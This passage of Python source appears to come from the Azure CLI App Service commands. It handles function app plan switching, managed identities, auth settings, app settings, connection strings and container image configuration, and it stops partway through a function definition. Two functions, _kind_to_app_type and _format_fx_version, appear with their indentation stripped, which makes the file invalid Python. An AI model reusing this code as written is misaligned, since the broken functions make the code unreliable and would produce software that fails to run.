    client = web_client_factory(cmd.cli_ctx)
    if plan is not None:
        if is_valid_resource_id(plan):
            parsed_dest = parse_resource_id(plan)
            dest_plan_info = client.app_service_plans.get(parsed_dest['resource_group'],
                                                          parsed_dest['name'])
        else:
            # Plain plan name: look it up in the app's own resource group.
            dest_plan_info = client.app_service_plans.get(instance.resource_group, plan)
        if dest_plan_info is None:
            raise ResourceNotFoundError("The plan '{}' doesn't exist".format(plan))
        validate_plan_switch_compatibility(cmd, client, instance, dest_plan_info, force)
        instance.server_farm_id = dest_plan_info.id
    return instance
def validate_plan_switch_compatibility(cmd, client, src_functionapp_instance, dest_plan_instance, force):
    """Reject plan moves that are not Consumption <-> Elastic Premium on Windows.

    Premium -> Consumption is allowed only with force=True, since it can
    break apps that rely on Premium-only features.
    """
    general_switch_msg = 'Currently the switch is only allowed between a Consumption or an Elastic Premium plan.'
    src_parse_result = parse_resource_id(src_functionapp_instance.server_farm_id)
    src_plan_info = client.app_service_plans.get(src_parse_result['resource_group'],
                                                 src_parse_result['name'])
    if src_plan_info is None:
        raise ResourceNotFoundError('Could not determine the current plan of the functionapp')
    # Ensure all plans involved are windows. Reserved = true indicates Linux.
    if src_plan_info.reserved or dest_plan_instance.reserved:
        raise ValidationError('This feature currently supports windows to windows plan migrations. For other '
                              'migrations, please redeploy.')
    src_is_premium = is_plan_elastic_premium(cmd, src_plan_info)
    src_is_consumption = is_plan_consumption(cmd, src_plan_info)
    dest_is_premium = is_plan_elastic_premium(cmd, dest_plan_instance)
    dest_is_consumption = is_plan_consumption(cmd, dest_plan_instance)
    if not (src_is_consumption or src_is_premium):
        raise ValidationError('Your functionapp is not using a Consumption or an Elastic Premium plan. ' +
                              general_switch_msg)
    if not (dest_is_consumption or dest_is_premium):
        raise ValidationError('You are trying to move to a plan that is not a Consumption or an '
                              'Elastic Premium plan. ' +
                              general_switch_msg)
    if src_is_premium and dest_is_consumption:
        logger.warning('WARNING: Moving a functionapp from Premium to Consumption might result in loss of '
                       'functionality and cause the app to break. Please ensure the functionapp is compatible '
                       'with a Consumption plan and is not using any features only available in Premium.')
        if not force:
            raise RequiredArgumentMissingError('If you want to migrate a functionapp from a Premium to Consumption '
                                               'plan, please re-run this command with the \'--force\' flag.')
def set_functionapp(cmd, resource_group_name, name, **kwargs):
    """Setter used by the generic 'update' machinery: PUT the modified site back."""
    # the patched site object is supplied via kwargs['parameters']
    instance = kwargs['parameters']
    client = web_client_factory(cmd.cli_ctx)
    return client.web_apps.begin_create_or_update(resource_group_name, name, site_envelope=instance)
def get_functionapp(cmd, resource_group_name, name, slot=None):
    """Fetch a site and verify it is actually a function app."""
    function_app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    is_functionapp = bool(function_app) and 'function' in function_app.kind
    if not is_functionapp:
        raise ResourceNotFoundError("Unable to find App {} in resource group {}".format(name, resource_group_name))
    return function_app
def show_functionapp(cmd, resource_group_name, name, slot=None):
    """Show a function app's details; errors if the site is not a function app."""
    return _show_app(cmd, resource_group_name, name, 'functionapp', slot)
def list_webapp(cmd, resource_group_name=None):
    """List web apps, excluding function apps and sites with a null kind."""
    apps = _list_app(cmd.cli_ctx, resource_group_name)
    # ignore apps with kind==null & not functions apps
    return [app for app in apps if app.kind is not None and "function" not in app.kind.lower()]
def list_deleted_webapp(cmd, resource_group_name=None, name=None, slot=None):
    """List deleted apps matching the optional filters, ordered by deleted-site id."""
    deleted_sites = _list_deleted_app(cmd.cli_ctx, resource_group_name, name, slot)
    deleted_sites.sort(key=lambda site: site.deleted_site_id)
    return deleted_sites
def restore_deleted_webapp(cmd, deleted_id, resource_group_name, name, slot=None, restore_content_only=None):
    """Restore a deleted app into an existing site (or slot).

    When restore_content_only is truthy only content is recovered; otherwise
    configuration is recovered as well (recover_configuration is its negation).
    """
    DeletedAppRestoreRequest = cmd.get_models('DeletedAppRestoreRequest')
    request = DeletedAppRestoreRequest(deleted_site_id=deleted_id, recover_configuration=not restore_content_only)
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_restore_from_deleted_app',
                                   slot, request)
def list_function_app(cmd, resource_group_name=None):
    """List only the sites whose kind marks them as function apps."""
    all_apps = _list_app(cmd.cli_ctx, resource_group_name)
    return [app for app in all_apps if app.kind is not None and "function" in app.kind.lower()]
def _show_app(cmd, resource_group_name, name, cmd_app_type, slot=None):
    """Fetch an app and validate it matches the expected type (webapp/functionapp/logicapp).

    On success the returned site object is enriched with its site_config and
    the FTP publishing URL for display purposes.
    """
    app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    if not app:
        raise ResourceNotFoundError("Unable to find {} '{}', in RG '{}'.".format(
                                    cmd_app_type, name, resource_group_name))
    app_type = _kind_to_app_type(app.kind) if app else None
    if app_type != cmd_app_type:
        # wrong command group for this kind of site; second argument is the
        # recommendation shown to the user
        raise ResourceNotFoundError(
            "Unable to find {app_type} '{name}', in resource group '{resource_group}'".format(
                app_type=cmd_app_type, name=name, resource_group=resource_group_name),
            "Use 'az {app_type} show' to show {app_type}s".format(app_type=app_type))
    app.site_config = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration',
                                              slot, api_version="2021-01-15")
    _rename_server_farm_props(app)
    _fill_ftp_publishing_url(cmd, app, resource_group_name, name, slot)
    return app
def _kind_to_app_type(kind):
if "workflow" in kind:
return "logicapp"
if "function" in kind:
return "functionapp"
return "webapp"
def _list_app(cli_ctx, resource_group_name=None):
    """List sites (optionally scoped to one resource group), renaming serverFarmId for output."""
    client = web_client_factory(cli_ctx)
    if resource_group_name:
        sites = list(client.web_apps.list_by_resource_group(resource_group_name))
    else:
        sites = list(client.web_apps.list())
    for site in sites:
        _rename_server_farm_props(site)
    return sites
def _list_deleted_app(cli_ctx, resource_group_name=None, name=None, slot=None):
    """Collect deleted sites across all deleted-app locations, then filter client-side."""
    client = web_client_factory(cli_ctx)
    deleted_sites = []
    for location in _get_deleted_apps_locations(cli_ctx):
        deleted_sites.extend(client.deleted_web_apps.list_by_location(location))
    if resource_group_name:
        deleted_sites = [site for site in deleted_sites if site.resource_group == resource_group_name]
    if name:
        deleted_sites = [site for site in deleted_sites if site.deleted_site_name.lower() == name.lower()]
    if slot:
        deleted_sites = [site for site in deleted_sites if site.slot.lower() == slot.lower()]
    return deleted_sites
def _build_identities_info(identities):
    """Split an identity list into (ARM identity dict, type string, user-assigned ids, has-system-assigned).

    An empty list, or the MSI_LOCAL_ID sentinel, selects the system-assigned
    identity; any other entries are user-assigned identity resource ids.
    """
    from ._appservice_utils import MSI_LOCAL_ID
    identities = identities or []
    external_identities = [identity for identity in identities if identity != MSI_LOCAL_ID]
    types = []
    if not identities or MSI_LOCAL_ID in identities:
        types.append('SystemAssigned')
    if external_identities:
        types.append('UserAssigned')
    identity_types = ','.join(types)
    info = {'type': identity_types}
    if external_identities:
        info['userAssignedIdentities'] = {identity: {} for identity in external_identities}
    return (info, identity_types, external_identities, 'SystemAssigned' in identity_types)
def assign_identity(cmd, resource_group_name, name, assign_identities=None, role='Contributor', slot=None, scope=None):
    """Enable system- and/or user-assigned managed identities on an app.

    Delegates to the shared ARM assign_identity helper (which also assigns
    ``role`` over ``scope`` when given), driving it with the getter/setter
    closures below. Returns the app's resulting identity object.
    """
    ManagedServiceIdentity, ResourceIdentityType = cmd.get_models('ManagedServiceIdentity',
                                                                  'ManagedServiceIdentityType')
    UserAssignedIdentitiesValue = cmd.get_models('Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties')  # pylint: disable=line-too-long
    _, _, external_identities, enable_local_identity = _build_identities_info(assign_identities)
    def getter():
        # current site state, re-fetched by the ARM helper before patching
        return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    def setter(webapp):
        # Merge the requested identities with whatever the app already has:
        # any mix of existing/new system+user identities collapses to the
        # SystemAssigned,UserAssigned composite type.
        if webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned_user_assigned:
            identity_types = ResourceIdentityType.system_assigned_user_assigned
        elif webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned and external_identities:
            identity_types = ResourceIdentityType.system_assigned_user_assigned
        elif webapp.identity and webapp.identity.type == ResourceIdentityType.user_assigned and enable_local_identity:
            identity_types = ResourceIdentityType.system_assigned_user_assigned
        elif external_identities and enable_local_identity:
            identity_types = ResourceIdentityType.system_assigned_user_assigned
        elif external_identities:
            identity_types = ResourceIdentityType.user_assigned
        else:
            identity_types = ResourceIdentityType.system_assigned
        if webapp.identity:
            webapp.identity.type = identity_types
        else:
            webapp.identity = ManagedServiceIdentity(type=identity_types)
        if external_identities:
            # add each requested user-assigned identity to the identity map
            if not webapp.identity.user_assigned_identities:
                webapp.identity.user_assigned_identities = {}
            for identity in external_identities:
                webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
        poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_create_or_update',
                                         extra_parameter=webapp, slot=slot)
        return LongRunningOperation(cmd.cli_ctx)(poller)
    from azure.cli.core.commands.arm import assign_identity as _assign_identity
    webapp = _assign_identity(cmd.cli_ctx, getter, setter, role, scope)
    return webapp.identity
def show_identity(cmd, resource_group_name, name, slot=None):
    """Show an app's managed identity; errors if the app cannot be found."""
    web_app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    if web_app:
        return web_app.identity
    raise ResourceNotFoundError("Unable to find App {} in resource group {}".format(name, resource_group_name))
def remove_identity(cmd, resource_group_name, name, remove_identities=None, slot=None):
    """Remove system- and/or user-assigned managed identities from an app.

    Delegates to the shared ARM assign_identity helper with the getter/setter
    closures below; returns the app's remaining identity object.
    """
    IdentityType = cmd.get_models('ManagedServiceIdentityType')
    UserAssignedIdentitiesValue = cmd.get_models('Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties')  # pylint: disable=line-too-long
    _, _, external_identities, remove_local_identity = _build_identities_info(remove_identities)
    def getter():
        return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    def setter(webapp):
        # nothing to remove when the app has no identity at all
        if webapp.identity is None:
            return webapp
        to_remove = []
        existing_identities = {x.lower() for x in list((webapp.identity.user_assigned_identities or {}).keys())}
        if external_identities:
            to_remove = {x.lower() for x in external_identities}
            non_existing = to_remove.difference(existing_identities)
            if non_existing:
                raise CLIError("'{}' are not associated with '{}'".format(','.join(non_existing), name))
            # removing the last user-assigned identity downgrades the type
            if not list(existing_identities - to_remove):
                if webapp.identity.type == IdentityType.user_assigned:
                    webapp.identity.type = IdentityType.none
                elif webapp.identity.type == IdentityType.system_assigned_user_assigned:
                    webapp.identity.type = IdentityType.system_assigned
        # cleared here; rebuilt below when user-assigned identities survive
        webapp.identity.user_assigned_identities = None
        if remove_local_identity:
            # dropping the system identity keeps user-assigned ones if present
            webapp.identity.type = (IdentityType.none
                                    if webapp.identity.type == IdentityType.system_assigned or
                                    webapp.identity.type == IdentityType.none
                                    else IdentityType.user_assigned)
        if webapp.identity.type not in [IdentityType.none, IdentityType.system_assigned]:
            # repopulate the map with the identities that were not removed
            webapp.identity.user_assigned_identities = {}
            if to_remove:
                for identity in list(existing_identities - to_remove):
                    webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
            else:
                for identity in list(existing_identities):
                    webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
        poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_create_or_update', slot, webapp)
        return LongRunningOperation(cmd.cli_ctx)(poller)
    from azure.cli.core.commands.arm import assign_identity as _assign_identity
    webapp = _assign_identity(cmd.cli_ctx, getter, setter)
    return webapp.identity
def get_auth_settings(cmd, resource_group_name, name, slot=None):
    """Return the site's (or slot's) authentication/authorization settings."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_auth_settings', slot)
def is_auth_runtime_version_valid(runtime_version=None):
    """Validate an auth runtime version string.

    Accepted forms: None (unset), '~N' where N parses as an integer, or a
    dotted 'x.y.z' version whose three components all parse as integers.
    Returns True when valid, False otherwise.
    """
    if runtime_version is None:
        return True
    # tilde wildcard, e.g. '~2' (anything int() accepts after the '~')
    if runtime_version.startswith('~') and len(runtime_version) > 1:
        try:
            int(runtime_version[1:])
        except ValueError:
            return False
        return True
    parts = runtime_version.split('.')
    if len(parts) != 3:
        return False
    try:
        for part in parts:
            int(part)
    except ValueError:
        return False
    return True
def update_auth_settings(cmd, resource_group_name, name, enabled=None, action=None,  # pylint: disable=unused-argument
                         client_id=None, token_store_enabled=None, runtime_version=None,  # pylint: disable=unused-argument
                         token_refresh_extension_hours=None,  # pylint: disable=unused-argument
                         allowed_external_redirect_urls=None, client_secret=None,  # pylint: disable=unused-argument
                         client_secret_certificate_thumbprint=None,  # pylint: disable=unused-argument
                         allowed_audiences=None, issuer=None, facebook_app_id=None,  # pylint: disable=unused-argument
                         facebook_app_secret=None, facebook_oauth_scopes=None,  # pylint: disable=unused-argument
                         twitter_consumer_key=None, twitter_consumer_secret=None,  # pylint: disable=unused-argument
                         google_client_id=None, google_client_secret=None,  # pylint: disable=unused-argument
                         google_oauth_scopes=None, microsoft_account_client_id=None,  # pylint: disable=unused-argument
                         microsoft_account_client_secret=None,  # pylint: disable=unused-argument
                         microsoft_account_oauth_scopes=None, slot=None):  # pylint: disable=unused-argument
    """Update the Easy Auth (V1) settings of a site or slot.

    Keyword names match SiteAuthSettings attributes 1:1; the body copies them
    reflectively from the current stack frame instead of naming each one,
    which is why the parameters are marked unused for pylint.
    """
    auth_settings = get_auth_settings(cmd, resource_group_name, name, slot)
    UnauthenticatedClientAction = cmd.get_models('UnauthenticatedClientAction')
    if action == 'AllowAnonymous':
        auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.allow_anonymous
    elif action:
        # any other action is a provider name: redirect unauthenticated clients
        # to login with that provider as the default
        auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.redirect_to_login_page
        auth_settings.default_provider = AUTH_TYPES[action]
    # validate runtime version
    if not is_auth_runtime_version_valid(runtime_version):
        raise CLIError('Usage Error: --runtime-version set to invalid value')
    import inspect
    frame = inspect.currentframe()
    # these flags arrive as 'true'/'false' strings and are converted to bool below
    bool_flags = ['enabled', 'token_store_enabled']
    # note: getargvalues is used already in azure.cli.core.commands.
    # and no simple functional replacement for this deprecating method for 3.5
    args, _, _, values = inspect.getargvalues(frame)  # pylint: disable=deprecated-method
    # copy every argument after (cmd, resource_group_name) onto the settings model.
    # NOTE(review): args[2:] also includes 'name' and 'slot' — presumably harmless
    # extra attributes on the model; confirm before tightening the slice.
    for arg in args[2:]:
        if values.get(arg, None):
            setattr(auth_settings, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_auth_settings', slot, auth_settings)
def list_instances(cmd, resource_group_name, name, slot=None):
    """List the scale-out instance identifiers of a web app or slot."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                   'list_instance_identifiers', slot)
def list_runtimes(cmd, os_type=None, linux=False):
    """List built-in web-app runtime stack names, optionally filtered by OS.

    --linux (deprecated in favour of --os-type) restricts to Linux stacks;
    the two filters are mutually exclusive.
    """
    if os_type is not None and linux:
        raise MutuallyExclusiveArgumentError("Cannot use both --os-type and --linux")
    # default to both OS flavours, then narrow by the given filter
    if linux:
        show_linux, show_windows = True, False
    else:
        show_linux = show_windows = True
    if os_type == WINDOWS_OS_NAME:
        show_linux = False
    if os_type == LINUX_OS_NAME:
        show_windows = False
    helper = _StackRuntimeHelper(cmd=cmd, linux=show_linux, windows=show_windows)
    return helper.get_stack_names_only(delimiter=":")
def list_function_app_runtimes(cmd, os_type=None):
    """List function-app runtime stacks; both OSes keyed by name unless filtered."""
    # with no filter both flags stay True and a dict keyed by OS is returned
    show_linux = os_type != WINDOWS_OS_NAME
    show_windows = os_type != LINUX_OS_NAME
    helper = _FunctionAppStackRuntimeHelper(cmd=cmd, linux=show_linux, windows=show_windows)
    linux_stacks = [stack.to_dict() for stack in helper.stacks if stack.linux]
    windows_stacks = [stack.to_dict() for stack in helper.stacks if not stack.linux]
    if show_linux and not show_windows:
        return linux_stacks
    if show_windows and not show_linux:
        return windows_stacks
    return {WINDOWS_OS_NAME: windows_stacks, LINUX_OS_NAME: linux_stacks}
def delete_function_app(cmd, resource_group_name, name, slot=None):
    """Delete a function app (or one of its slots)."""
    operation = 'delete'
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, operation, slot)
def delete_webapp(cmd, resource_group_name, name, keep_metrics=None, keep_empty_plan=None,
                  keep_dns_registration=None, slot=None):  # pylint: disable=unused-argument
    """Delete a web app or slot.

    keep_metrics / keep_empty_plan suppress deletion of metrics and of an
    emptied app-service plan; the service defaults apply when unset (None).
    """
    client = web_client_factory(cmd.cli_ctx)
    delete_kwargs = {
        'delete_metrics': False if keep_metrics else None,
        'delete_empty_server_farm': False if keep_empty_plan else None,
    }
    if slot:
        client.web_apps.delete_slot(resource_group_name, name, slot, **delete_kwargs)
    else:
        client.web_apps.delete(resource_group_name, name, **delete_kwargs)
def stop_webapp(cmd, resource_group_name, name, slot=None):
    """Stop a web app or slot."""
    operation = 'stop'
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, operation, slot)
def start_webapp(cmd, resource_group_name, name, slot=None):
    """Start a web app or slot."""
    operation = 'start'
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, operation, slot)
def restart_webapp(cmd, resource_group_name, name, slot=None):
    """Restart a web app or slot."""
    operation = 'restart'
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, operation, slot)
def get_site_configs(cmd, resource_group_name, name, slot=None):
    """Fetch the SiteConfig object of a web app or slot."""
    operation = 'get_configuration'
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, operation, slot)
def get_app_settings(cmd, resource_group_name, name, slot=None):
    """Return app settings as a list of dicts, each flagged if it is slot-sticky."""
    settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                       'list_application_settings', slot)
    client = web_client_factory(cmd.cli_ctx)
    sticky_names = client.web_apps.list_slot_configuration_names(resource_group_name, name).app_setting_names
    return _build_app_settings_output(settings.properties, sticky_names)
# Check if the app setting is propagated to the Kudu site correctly by calling api/settings endpoint
# should_have [] is a list of app settings which are expected to be set
# should_not_have [] is a list of app settings which are expected to be absent
# should_contain {} is a dictionary of app settings which are expected to be set with precise values
# Return True if validation succeeded
def validate_app_settings_in_scm(cmd, resource_group_name, name, slot=None,
                                 should_have=None, should_not_have=None, should_contain=None):
    """Check that app settings propagated to the Kudu site as expected.

    should_have: names that must be present; should_not_have: names that must
    be absent; should_contain: name->value pairs that must match exactly.
    Returns True when every given expectation holds.
    """
    kudu_settings = _get_app_settings_from_scm(cmd, resource_group_name, name, slot)
    present = set(kudu_settings)
    if should_have and not set(should_have) <= present:
        return False
    if should_not_have and set(should_not_have) & present:
        return False
    expected = dict(kudu_settings)
    expected.update(should_contain or {})
    return expected == kudu_settings
@retryable_method(3, 5)
def _get_app_settings_from_scm(cmd, resource_group_name, name, slot=None):
    """Read the app settings the Kudu (SCM) site reports, retried up to 3 times."""
    import requests
    scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
    username, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
    headers = {
        'Content-Type': 'application/octet-stream',
        'Cache-Control': 'no-cache',
        'User-Agent': get_az_user_agent()
    }
    response = requests.get('{}/api/settings'.format(scm_url), headers=headers,
                            auth=(username, password), timeout=3)
    return response.json() or {}
def get_connection_strings(cmd, resource_group_name, name, slot=None):
    """Return connection strings as dicts with name/value/type and slot-sticky flag."""
    conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                           'list_connection_strings', slot)
    client = web_client_factory(cmd.cli_ctx)
    sticky_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
        .connection_string_names or []
    return [{'name': key,
             'value': pair.value,
             'type': pair.type,
             'slotSetting': key in sticky_names}
            for key, pair in conn_strings.properties.items()]
def get_azure_storage_accounts(cmd, resource_group_name, name, slot=None):
    """Return the site's Azure storage account mounts with slot-sticky flags."""
    client = web_client_factory(cmd.cli_ctx)
    accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                       'list_azure_storage_accounts', slot)
    sticky_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
        .azure_storage_config_names or []
    return [{'name': key,
             'value': value,
             'slotSetting': key in sticky_names}
            for key, value in accounts.properties.items()]
def _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot=None):
    """Attach the FTP publish URL to *webapp* when an FTP publish profile exists."""
    profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
    for profile in profiles:
        if profile['publishMethod'] == 'FTP':
            webapp.ftpPublishingUrl = profile['publishUrl']
            break
    return webapp
def _format_fx_version(custom_image_name, container_config_type=None):
lower_custom_image_name = custom_image_name.lower()
if "https://" in lower_custom_image_name or "http://" in lower_custom_image_name:
custom_image_name = lower_custom_image_name.replace("https://", "").replace("http://", "")
fx_version = custom_image_name.strip()
fx_version_lower = fx_version.lower()
# handles case of only spaces
if fx_version:
if container_config_type:
fx_version = '{}|{}'.format(container_config_type, custom_image_name)
elif not fx_version_lower.startswith('docker|'):
fx_version = '{}|{}'.format('DOCKER', custom_image_name)
else:
fx_version = ' '
return fx_version
def _add_fx_version(cmd, resource_group_name, name, custom_image_name, slot=None):
    """Apply a container image to the site, choosing linux vs windows fx by site kind."""
    fx_version = _format_fx_version(custom_image_name)
    web_app = get_webapp(cmd, resource_group_name, name, slot)
    if not web_app:
        raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
    # reserved => Linux site; is_xenon => Windows container site
    use_linux = web_app.reserved or not web_app.is_xenon
    linux_fx = fx_version if use_linux else None
    windows_fx = fx_version if web_app.is_xenon else None
    return update_site_configs(cmd, resource_group_name, name,
                               linux_fx_version=linux_fx, windows_fx_version=windows_fx, slot=slot)
def _delete_linux_fx_version(cmd, resource_group_name, name, slot=None):
    """Reset linux_fx_version to a single space (the service's 'unset' value)."""
    blank_fx = ' '
    return update_site_configs(cmd, resource_group_name, name, linux_fx_version=blank_fx, slot=slot)
def _get_fx_version(cmd, resource_group_name, name, slot=None):
    """Return linux_fx_version, falling back to windows_fx_version, else ''."""
    config = get_site_configs(cmd, resource_group_name, name, slot)
    for fx in (config.linux_fx_version, config.windows_fx_version):
        if fx:
            return fx
    return ''
def url_validator(url):
    """Return True when *url* parses with a scheme, network location and path."""
    try:
        parts = urlparse(url)
    except ValueError:
        return False
    return bool(parts.scheme and parts.netloc and parts.path)
def _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot=None):
    """Decode the base64 multicontainer config embedded in the site's fx version."""
    from base64 import b64decode
    fx_version = _get_fx_version(cmd, resource_group_name, name, slot)
    if not any(fx_version.startswith(prefix) for prefix in MULTI_CONTAINER_TYPES):
        raise CLIError("Cannot decode config that is not one of the"
                       " following types: {}".format(','.join(MULTI_CONTAINER_TYPES)))
    # fx version has the form '<TYPE>|<base64 config>'
    encoded = fx_version.split('|')[1]
    return b64decode(encoded.encode('utf-8'))
def _get_linux_multicontainer_encoded_config_from_file(file_name):
    """Read a multicontainer config from a URL or local file and return it base64-encoded."""
    from base64 import b64encode
    if url_validator(file_name):
        raw = urlopen(file_name, context=_ssl_context()).read()
    else:
        with open(file_name, 'rb') as config_file:
            raw = config_file.read()
    # Decode base64 encoded byte array into string
    return b64encode(raw).decode('utf-8')
# for any modifications to the non-optional parameters, adjust the reflection logic accordingly
# in the method
# pylint: disable=unused-argument
def update_site_configs(cmd, resource_group_name, name, slot=None, number_of_workers=None, linux_fx_version=None,
                        windows_fx_version=None, pre_warmed_instance_count=None, php_version=None,
                        python_version=None, net_framework_version=None,
                        java_version=None, java_container=None, java_container_version=None,
                        remote_debugging_enabled=None, web_sockets_enabled=None,
                        always_on=None, auto_heal_enabled=None,
                        use32_bit_worker_process=None,
                        min_tls_version=None,
                        http20_enabled=None,
                        app_command_line=None,
                        ftps_state=None,
                        vnet_route_all_enabled=None,
                        generic_configurations=None):
    """Update a site's configuration from the given keyword arguments.

    Named arguments map 1:1 onto SiteConfig attributes and are copied
    reflectively from the current frame; generic_configurations accepts JSON
    blobs or KEY=VALUE strings for any other attribute.
    """
    configs = get_site_configs(cmd, resource_group_name, name, slot)
    if number_of_workers is not None:
        number_of_workers = validate_range_of_int_flag('--number-of-workers', number_of_workers, min_val=0, max_val=20)
    if linux_fx_version:
        if linux_fx_version.strip().lower().startswith('docker|'):
            # single-container docker sites must not mount the app-service file share
            update_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE=false"])
        else:
            delete_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE"])
    if pre_warmed_instance_count is not None:
        pre_warmed_instance_count = validate_range_of_int_flag('--prewarmed-instance-count', pre_warmed_instance_count,
                                                               min_val=0, max_val=20)
    import inspect
    frame = inspect.currentframe()
    # flags arriving as 'true'/'false' strings, converted to bool on assignment
    bool_flags = ['remote_debugging_enabled', 'web_sockets_enabled', 'always_on',
                  'auto_heal_enabled', 'use32_bit_worker_process', 'http20_enabled', 'vnet_route_all_enabled']
    int_flags = ['pre_warmed_instance_count', 'number_of_workers']
    # note: getargvalues is used already in azure.cli.core.commands.
    # and no simple functional replacement for this deprecating method for 3.5
    args, _, _, values = inspect.getargvalues(frame)  # pylint: disable=deprecated-method
    # copy arguments after (cmd, resource_group_name, name) onto the config object.
    # NOTE(review): args[3:] also includes 'slot' — presumably a harmless extra
    # attribute on the model; confirm before tightening the slice.
    for arg in args[3:]:
        if arg in int_flags and values[arg] is not None:
            values[arg] = validate_and_convert_to_int(arg, values[arg])
        if arg != 'generic_configurations' and values.get(arg, None):
            setattr(configs, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
    generic_configurations = generic_configurations or []
    # https://github.com/Azure/azure-cli/issues/14857
    updating_ip_security_restrictions = False
    result = {}
    for s in generic_configurations:
        try:
            json_object = get_json_object(s)
            for config_name in json_object:
                if config_name.lower() == 'ip_security_restrictions':
                    updating_ip_security_restrictions = True
            result.update(json_object)
        except CLIError:
            # not JSON: fall back to KEY=VALUE parsing
            config_name, value = s.split('=', 1)
            result[config_name] = value
    for config_name, value in result.items():
        if config_name.lower() == 'ip_security_restrictions':
            updating_ip_security_restrictions = True
        setattr(configs, config_name, value)
    if not updating_ip_security_restrictions:
        # avoid clobbering access restrictions when they are not being edited
        setattr(configs, 'ip_security_restrictions', None)
        setattr(configs, 'scm_ip_security_restrictions', None)
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
def delete_app_settings(cmd, resource_group_name, name, setting_names, slot=None):
    """Remove app settings from a site/slot, also dropping them from the slot-sticky list."""
    app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                           'list_application_settings', slot)
    client = web_client_factory(cmd.cli_ctx)
    slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
    sticky_changed = False
    for setting in setting_names:
        app_settings.properties.pop(setting, None)
        if slot_cfg_names.app_setting_names and setting in slot_cfg_names.app_setting_names:
            slot_cfg_names.app_setting_names.remove(setting)
            sticky_changed = True
    if sticky_changed:
        client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
    result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
                                         'update_application_settings',
                                         app_settings, slot, client)
    return _build_app_settings_output(result.properties, slot_cfg_names.app_setting_names)
def delete_azure_storage_accounts(cmd, resource_group_name, name, custom_id, slot=None):
    """Remove one Azure storage mount, also dropping it from the slot-sticky list."""
    accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                       'list_azure_storage_accounts', slot)
    client = web_client_factory(cmd.cli_ctx)
    slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
    accounts.properties.pop(custom_id, None)
    sticky_changed = False
    if slot_cfg_names.azure_storage_config_names and custom_id in slot_cfg_names.azure_storage_config_names:
        slot_cfg_names.azure_storage_config_names.remove(custom_id)
        sticky_changed = True
    if sticky_changed:
        client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
    result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
                                         'update_azure_storage_accounts', accounts,
                                         slot, client)
    return result.properties
def _ssl_context():
    """Return an SSL context for outbound HTTPS requests.

    Falls back to a permissive TLS context on very old Pythons or when running
    in Cloud Shell on Windows; otherwise uses the platform's verified default.
    """
    # BUG FIX: the original called sys.platform.system() — sys.platform is a
    # plain str and has no .system(), which raised AttributeError whenever the
    # cloud-console branch was evaluated. platform.system() is the correct API.
    import platform
    if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
        try:
            return ssl.SSLContext(ssl.PROTOCOL_TLS)  # added in python 2.7.13 and 3.6
        except AttributeError:
            return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
    return ssl.create_default_context()
def _build_app_settings_output(app_settings, slot_cfg_names):
    """Shape a settings dict into the CLI list output, masking credential values."""
    sticky_names = slot_cfg_names or []
    masked = _mask_creds_related_appsettings(app_settings)
    return [{'name': key,
             'value': app_settings[key],
             'slotSetting': key in sticky_names}
            for key in masked]
def update_connection_strings(cmd, resource_group_name, name, connection_string_type,
                              settings=None, slot=None, slot_settings=None):
    """Add or update connection strings on a site/slot.

    settings / slot_settings are 'NAME=value' strings; slot_settings are also
    marked slot-sticky. At least one of the two must be supplied.
    Returns the updated connection-string properties.
    """
